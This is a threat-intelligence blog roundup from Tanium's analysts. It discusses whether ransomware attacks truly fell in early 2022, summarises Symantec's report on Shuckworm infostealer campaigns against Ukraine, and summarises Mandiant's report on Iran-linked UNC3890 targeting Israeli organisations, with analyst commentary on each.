The State of Ransomware in 2022: Cyber Threat Intelligence Roundup
Investigating ransomware data from the first half of 2022, the latest on information-stealing malware deployed by Russia’s Shuckworm APT, and a look at UNC3890 activity observed actively targeting Israeli organizations
This week, we explore whether a widely reported decline in the number of ransomware attacks in the first half of 2022 is legitimate or simply the result of various combined factors contributing to a skewed — and misleading — dataset.
Next, we provide a summary of Symantec’s latest reporting on the activities of the Shuckworm APT, a threat group believed to be associated with Russia’s notorious Federal Security Service (FSB). We also look at the activity of a suspected Iran-linked threat actor, which has so far focused its efforts on the targeting of Israeli shipping, healthcare, and government entities.
1. Is the widely reported drop in ransomware numbers an illusion?
Tim Starks at the Washington Post recently posed an interesting question: Is the supposed drop in the number of ransomware attacks observed thus far in the first half of 2022 a reflection of reality? Or are the declining numbers the result of a perfect storm of contributing factors and information gaps?
The shorter answer seems to be that the issue is not so much whether the number of ransomware attacks has fallen off (CTI’s daily research would seem to support the opposite) but more about whether the sources reporting the numbers have access to less information than ever before. The longer answer seems to be a combination of the two.
So, what’s contributing to the dwindling number of attacks being reported to the people responsible for tracking such things? First, let’s look at the numbers being reported by reputable sources so that we can be sure this isn’t all just conjecture.
From the Washington Post story: “One of the first tallies pointing to a decline came last month from the Ransomware Task Force, made up of experts from government, industry, academia and nonprofits. It documented 64 attacks on local government, hospitals and schools in 2022 to that point, compared with 150 incidents from the same period last year.”
The article also mentions how in July, SonicWall, NCC Group and GuidePoint Security all pointed to decreases across the board. However, the companies covered various time periods.
Of course, not all researchers have reached identical conclusions — a commonplace occurrence in our industry. After all, companies have access to different telemetry and sources. Plus, researchers adhere to different definitions of what constitutes a true ransomware incident.
For example, Avast claimed just last week that ransomware incidents had increased from Q1 to Q2 of 2022 — although Avast had to admit that their researchers observed decreasing numbers of attacks from the end of 2021 and the beginning of 2022. SecureWorks reached a similar conclusion.
So, if ransomware is truly alive and well, what are some of the factors that have contributed to this potentially skewed dataset?
Starks points to the following developments as possible circumstances that may be distorting the numbers:
- Shift in threat actor TTPs: Many ransomware gangs have begun using ransomware-like tactics, minus the malicious software (extortion without encryption), and are now focusing on data theft and threatening to release it without necessarily locking up enterprise systems.
- Shift in targeting: To avoid attracting the ire of policymakers and law enforcement, ransomware gangs have also started targeting smaller organizations. This follows a wave of high-profile ransomware attacks on blue-chip victims like JBS, Kaseya, and Colonial Pipeline last year.
- Smaller targets = smaller resources: Smaller victims are less likely to report their ransomware incidents to any of the entities tasked with keeping track of them.
As stated by Don Smith, vice president of intelligence at SecureWorks’ Counter Threat Unit, “That [shift in targeting] then gives you a situation where, if you’re a medium-to-large enterprise, you may not have a relationship with a national CERT,” or government computer emergency response team. “You may not be prepared to pay for top-tier incident response companies to help you with your problem. And therefore, from that sort of hilltop observation a lot of people may have reporting bias, which can explain this disparity.”
But what if attacks have fallen off?
Of course, at this early stage, many of the factors described above are still considered hypotheses. There remains the possibility — despite the occasional slight disparity in numbers between reporting organizations — that ransomware attacks truly have decreased as of late.
If this is the case, the following may be some contributing factors:
- Sanctions on Russia: Russia, long viewed as a protective haven for the legions of ransomware gangs operating within its borders, may have hampered ransomware operators.
- Major ransomware operations disbanded or were disrupted: After a particularly productive period, the prolific ransomware group Conti apparently disbanded in May, following internal leaks that revealed the gang’s inner workings and the gang’s public (and very unpopular) message of alliance with Russia in the Russia/Ukraine conflict.
Whatever the reason for the apparent drop-off in ransomware incidents, CTI will continue to monitor the situation. We’ll continue to treat ransomware as a top threat and have a better picture of the driving forces behind the reported number of attacks as the year progresses.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“Tim Starks did a great job of illuminating how the statistics reported by various intelligence sources and government agencies can occasionally vary, and sometimes, vary wildly. It’s often all too easy to fall into a pattern of blind faith in the data being presented before us, particularly when that data originates from an entity that has historically proven itself a reliable source of information.
CTI will continue to monitor a variety of sources of ransomware statistics, keeping an eye out for any significant developments which could potentially impact the level of risk posed to Tanium and its suppliers, partners, and customers by extortion gangs.”
2. Infostealer is payload of choice for Russia’s Shuckworm APT in activity targeting Ukraine
A recent blog post from Symantec details new Shuckworm activity observed by the security firm, which has so far been aimed at Ukraine and appears to be delivering information-stealing malware to targeted networks.
According to Symantec, the activity was ongoing as recently as August 8, 2022, and much of the activity observed in this campaign is consistent with activity that was highlighted by CERT-UA on July 26, 2022.
Shuckworm: Russia-Linked Group Maintains #Ukraine Focus – #Gamaredon, #Armageddon malicious activity continues, #infostealer is payload in latest activity. Read blog for latest IoCs: https://t.co/r12KxfM8Hj #Russia #cyberattacks #Shuckworm pic.twitter.com/jY89dctrg8
— Threat Intelligence (@threatintel) August 15, 2022
What is Shuckworm?
Shuckworm (aka Gamaredon or Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. It’s generally considered to be a state-sponsored espionage operation, linked by the Ukrainian Secret Service (SSU) to the FSB.
Ukrainian intelligence has attributed the group with cyber operations targeting thousands of public, private, and governmental entities in the country in its attempts to collect intelligence, disrupt operations, and take control of critical infrastructure targets.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“There are two notable themes worth addressing in this narrative. The first is the increasing use of information-stealing malware (commonly referred to as info-stealers) among threat actors of all stripes. Intel 471 claims that since the beginning of 2022, the cyber threat intelligence firm has observed a 150% increase in the number of infostealers available on the dark web, compared to the same period in 2021. This is a clear indication of a strong demand among cyber threat actors for such products, as well as an indication of the high degree of attack success such software can aid in precipitating.
The second notable theme is the fact that Symantec’s reporting states that Shuckworm has so far restricted its focus to the targeting of Ukrainian entities. Despite various publicly available reports on the group’s activities, Shuckworm appears undeterred by publicity, and its operations continue unabated. Shuckworm may not be the most sophisticated asset within Russia’s hierarchy of state-backed threat actors, but – as pointed out by Symantec – it more than makes up for its technical shortcomings with its tenacity, persistence, and the relentlessness with which it engages its victims.
As with most of the malware and TTPs employed by the participants of the Russia/Ukraine conflict, the primary risk is “spillover” to Western organizations, networks, and critical infrastructure – the threat of which has been detailed continuously by CISA and its Shields Up initiative.”
3. UNC3890 Iranian hacker activity suspected of targeting Israeli shipping, healthcare, government, and energy sectors
A recent Mandiant report details the firms tracking of UNC3890, a cluster of activity targeting Israeli shipping, government, energy, and healthcare organizations via social engineering lures and a potential watering hole. Mandiant believes the actor is linked to Iran and likely conducts espionage activity to support Iranian interests.
What is UNC3890?
- UNC is short for uncategorized, refers to a cluster of activity. The operation leverages several publicly available tools, such as Metasploit, Unicorn, and NorthStar C2, in addition to at least two unique tools, a backdoor dubbed SUGARUSH and a browser credential stealer named SUGARDUMP.
- Mandiant first began tracking UNC3890 in late 2021, where it was observed targeting Israeli entities and showing interest in sectors including government, shipping, energy, aviation, and healthcare. While most of the targeting appears to be focused on Israel, some of the entities targeted by the group in the shipping sector were global companies, causing a potential impact expanding beyond Israel.
- Mandiant was primarily able to uncover post-exploitation implants utilized by UNC3890 but was able to identify a few findings that may shed light on the group’s initial access methodologies as well.
- A potential watering hole was identified hosted on the login page of a legitimate Israeli shipping company, which researchers believe was likely compromised by UNC3890. Upon entering the legitimate login page, the user would be sending a POST request, with preliminary data about the logged user, to an attacker. The watering hole is believed to have been used to target clients and users of the shipping company. Mandiant has observed an additional attempted targeting of another major Israeli shipping company by the group that is consistent with the watering hole.
- Several domains resolving to UNC3890’s C2 servers masqueraded as legitimate services and entities, including LinkedIn, Pfizer, Facebook, and Office 365. The domains were likely used to harvest credentials to the legitimate service, to send phishing lures, or as an attempt to blend in with expected network traffic. Mandiant also identified a UNC3890 server hosting several ZIP files containing scraped contents of Facebook and Instagram accounts of legitimate individuals.
- The operation is observed leveraging an XLS file designed to lure the victim with a fake job offer. The file installs SUGARDUMP, a credential harvesting tool. The fake job offer is for a software developer position at LexisNexis.
- After gaining initial access, the group leverages a broad toolset to access and control the environment.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“The fake job offer lure seems to be gaining popularity amongst threat actors lately (not to mention that it is a historically popular technique among Iran-linked threat actors, specifically) and UNC3890 is just the latest group to join the trend.
What’s a little different about UNC3890 is its targeting of shipping companies. Since it’s unclear exactly what data the threat actor gained access to when it reportedly deployed a watering hole against an Israeli shipping company, it is unclear what exactly the end goal was. Nonetheless, the operations’ use of custom credential harvesting tools and backdoors is indicative of a higher degree of adversarial sophistication.
Visit our cybersecurity content library
Want to learn more about the latest cybersecurity developments? We offer a wide range of cybersecurity articles, blogs, and videos. Have a look at our featured stories.